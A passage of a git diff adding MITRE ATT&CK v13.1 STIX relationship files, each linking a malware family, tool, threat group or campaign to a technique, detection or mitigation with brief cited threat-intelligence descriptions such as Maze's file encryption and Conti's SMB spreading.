"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json new file mode 100644 index 0000000000000000000000000000000000000000..9b85423886515ef1ca863eefba6b33cb8ac7e63a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--84aba35b-5aa2-4f83-9de8-8edaade0eefa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6", + "type": "relationship", + "created": "2022-03-30T14:26:51.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.847Z", + "description": "Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "source_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "target_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json new file mode 100644 index 0000000000000000000000000000000000000000..f273baaed593c25b2b784f902d40b8ebbbe8a263 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--6ebf9ef9-4139-4529-9d56-60512156a259", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8", + "type": "relationship", + "created": "2020-05-18T17:31:39.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + } + ], + "modified": "2020-06-24T01:39:05.871Z", + "description": "[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)", + "relationship_type": "uses", + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json new file mode 100644 index 0000000000000000000000000000000000000000..a9e2b3aae36fbfca82c97f588fcf2804ece24f29 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--46409a46-efd7-4a48-9c8d-092c8da1ceae", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00701b4a-9eab-41cc-9c09-f904a9799201", + "type": "relationship", + "created": "2021-01-19T21:06:07.784Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec RAINDROP January 2021", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "description": "Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021." + } + ], + "modified": "2021-01-20T13:56:30.150Z", + "description": "After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)", + "relationship_type": "uses", + "source_ref": "malware--4efc3e00-72f2-466a-ab7c-8a7dc6603b19", + "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json new file mode 100644 index 0000000000000000000000000000000000000000..aa559caa3822a1db374996fbc556e3b5c9696e1e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fd1370af-8c53-4148-8c01-0a4f4f452f87", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0", + "created": "2022-04-15T20:07:57.641Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTPS over ports 2083 and 2087 for C2.(Citation: Kaspersky WIRTE November 2021)", + "modified": "2022-04-15T20:07:57.641Z", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json new file mode 100644 index 0000000000000000000000000000000000000000..cac188e892e7da583841a77c164355cbd40ffaab --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--19bbe2ae-b64f-47d1-90d6-c65eb320dea2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d", + "type": "relationship", + "created": "2021-02-17T19:22:30.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason Conti Jan 2021", + "url": "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "description": "Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021." + }, + { + "source_name": "CarbonBlack Conti July 2020", + "url": "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", + "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021." + } + ], + "modified": "2021-04-14T12:56:37.287Z", + "description": "[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)", + "relationship_type": "uses", + "source_ref": "malware--4dea7d8e-af94-4bfb-afe4-7ff54f59308b", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json new file mode 100644 index 0000000000000000000000000000000000000000..2ccbe8e84a0e7941ef4e191bc05bd0a387e55693 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dec81ec6-4e26-4667-bce6-643a4e800424", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0078d802-53f2-4ee4-b802-492e9f121cbe", + "created": "2022-09-23T20:54:01.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-10T16:50:25.056Z", + "description": "During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [ccf32](https://attack.mitre.org/software/S1043) was used to collect data.(Citation: Bitdefender FunnyDream Campaign November 2020)", + "relationship_type": "uses", + "source_ref": "campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8", + "target_ref": "malware--a394448a-4576-41b8-81cc-9b61abad94ab", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json new file mode 100644 index 0000000000000000000000000000000000000000..5954d7e63733a4c5c3095da40491c9ffa5dd41f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--3bb7cfc5-d757-409b-90f8-65d404edde16", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--007cc21a-685a-4701-99c1-20f258cedc7c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye APT17", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + } + ], + "modified": "2020-03-17T19:06:43.759Z", + "description": "[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)", + "relationship_type": "uses", + "source_ref": "malware--d69c8146-ab35-4d50-8382-6fc80e641d43", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json new file mode 100644 index 0000000000000000000000000000000000000000..1696283a834efcc95886ec68173a38136369d97e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--f30798d8-9ba2-4cb5-9498-aa707aec6fd8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", + "type": "relationship", + "created": "2020-02-11T20:36:06.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-02-11T20:36:06.423Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json new file mode 100644 index 0000000000000000000000000000000000000000..69e9ddfbb35fe7a8f435733f6323c34dc6f2f82a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--4aa02b6d-f36f-4cdf-8035-308770b29667", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9", + "type": "relationship", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://github.com/n1nj4sec/pupy", + "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.", + "source_name": "GitHub Pupy" + } + ], + "modified": "2019-04-24T17:52:47.933Z", + "description": "[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)", + "relationship_type": "uses", + "source_ref": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json new file mode 100644 index 0000000000000000000000000000000000000000..25d9a1f9e11f4a9120052546aff1d1fe01e15497 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7b9778b6-4151-41ce-966b-60abf51296ef", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb", + "type": "relationship", + "created": "2021-12-06T15:43:24.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "US-CERT TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A" + } + ], + "modified": "2021-12-06T15:43:24.481Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) has compressed data into .zip files prior to exfiltration.(Citation: US-CERT TA18-074A)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json new file mode 100644 index 0000000000000000000000000000000000000000..e90186a3b324063e4d18e920486a5a399d73fdb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--08e30d6f-82f2-4feb-9acc-c4332c4ff544", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a", + "type": "relationship", + "created": "2020-10-15T16:47:27.531Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-02-17T13:12:51.765Z", + "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json new file mode 100644 index 0000000000000000000000000000000000000000..8c8c3f86f3c1098685982d975732f24d969b9c5a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--519ea3f9-f59e-424b-8bd5-133005010248", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35", + "type": "relationship", + "created": "2020-11-09T16:28:37.599Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Brazilian Banking Malware July 2020", + "url": "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "description": "GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020." + } + ], + "modified": "2020-11-09T16:28:37.599Z", + "description": "[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)", + "relationship_type": "uses", + "source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6", + "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json new file mode 100644 index 0000000000000000000000000000000000000000..bfc709df29adfcaad938358119fbcb0da9ac525b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b37cf429-2040-47a0-ba75-df26702fbaec", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9", + "type": "relationship", + "created": "2021-05-20T14:35:48.636Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021." + } + ], + "modified": "2021-10-18T19:54:13.384Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use sudo to run a command.(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json new file mode 100644 index 0000000000000000000000000000000000000000..aa4ca56d8f1c87d50a0edead77c30825cda4e888 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--0abac62c-b35f-4377-8ac9-c7e4ebb91a51", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000", + "type": "relationship", + "created": "2020-11-10T16:49:13.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020." + } + ], + "modified": "2020-11-10T16:49:13.291Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) obtained a code signing certificate signed by Digicert for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "target_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json new file mode 100644 index 0000000000000000000000000000000000000000..15630718966392d347713571cb003283d75be1c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--81ea8a77-185e-454d-86cb-3ac89bb426d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00aa618f-bcfa-4649-8436-134f9d01e43c", + "type": "relationship", + "created": "2020-06-19T21:25:43.683Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.", + "source_name": "Cybereason Cobalt Kitty 2017" + } + ], + "modified": "2020-06-29T21:37:55.941Z", + "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)\t", + "relationship_type": "uses", + "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json new file mode 100644 index 0000000000000000000000000000000000000000..75b188062a6cf2549ea61599ae5e11dec5536531 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--b442dfce-75b1-4b0b-bf35-eea7b79db548", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ae99d1-db02-4007-8669-04d7fc4c1390", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Sednit USBStealer 2014", + "description": "Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.", + "url": "http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + } + ], + "modified": "2020-03-11T17:45:54.045Z", + "description": "Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)", + "relationship_type": "uses", + "source_ref": "malware--af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", + "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json new file mode 100644 index 0000000000000000000000000000000000000000..c37ee6e8394ab0896b27969178f2e3b25666c91d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--6c619a31-48ab-47ea-8579-b735b6971b1e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957", + "type": "relationship", + 